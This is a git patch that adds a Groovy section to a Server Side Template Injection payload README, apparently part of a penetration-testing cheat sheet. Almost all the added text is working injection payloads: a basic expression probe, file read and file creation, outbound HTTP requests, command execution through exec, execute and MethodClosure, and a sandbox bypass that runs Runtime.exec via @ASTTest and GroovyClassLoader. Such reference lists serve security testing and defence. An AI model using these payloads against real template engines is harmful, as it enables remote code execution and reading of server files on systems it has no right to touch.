From 3db4d04467507e8ab2bca719c5ca20bf6b6ca8e2 Mon Sep 17 00:00:00 2001
From: 0x-nope <gianbaldi@gmail.com>
Date: Fri, 4 Mar 2022 17:39:28 +0100
Subject: [PATCH] added Groovy EL section

---
 Server Side Template Injection/README.md | 56 ++++++++++++++++++++++++
 1 file changed, 56 insertions(+)

diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md
index b70b1e3..94f00d7 100644
--- a/Server Side Template Injection/README.md
+++ b/Server Side Template Injection/README.md
@@ -15,6 +15,12 @@
 * [Freemarker](#freemarker)
 * [Basic injection](#freemarker---basic-injection)
 * [Code execution](#freemarker---code-execution)
+* [Groovy](#groovy)
+ * [Basic injection](#groovy---basic-injection)
+ * [Read/Create file](#groovy---read-and-create-file)
+ * [HTTP Request](#groovy---http-request)
+ * [Command execution](#groovy---command-execution)
+ * [Sandbox bypass](#groovy---sandbox-bypass)
 * [Handlebars](#handlebars)
 * [Jade / Codepen](#jade--codepen)
 * [Java](#java)
@@ -184,6 +190,56 @@ ${dwf.newInstance(ec,null)("id")} --- +## Groovy + +[Official website](https://groovy-lang.org/) + + +### Groovy - Basic injection + +Refer to https://groovy-lang.org/syntax.html , but `${9*9}` is the basic injection. + + +### Groovy - Read and create File + +```groovy +String x = new File('c:/windows/notepad.exe').text +String x = new File('/path/to/file').getText('UTF-8') +new File("C:\Temp\FileName.txt").createNewFile(); +``` + +### Groovy - HTTP request: + + +```groovy +"http://www.google.com".toURL().text +new URL("http://www.google.com").getText() +``` + +### Groovy - Command Execution + +```groovy +"calc.exe".exec() +"calc.exe".execute() +this.evaluate("9*9") //(this is a Script) +new org.codehaus.groovy.runtime.MethodClosure("calc.exe","execute").call() +``` + +### Groovy - Sandbox Bypass + +```groovy +@ASTTest(value={assert java.lang.Runtime.getRuntime().exec("whoami")}) +def x +``` + +or + +```groovy +new groovy.lang.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(value={assert java.lang.Runtime.getRuntime().exec(\"calc.exe\")})def x") +``` + +--- + ## Handlebars [Official website](https://handlebarsjs.com/)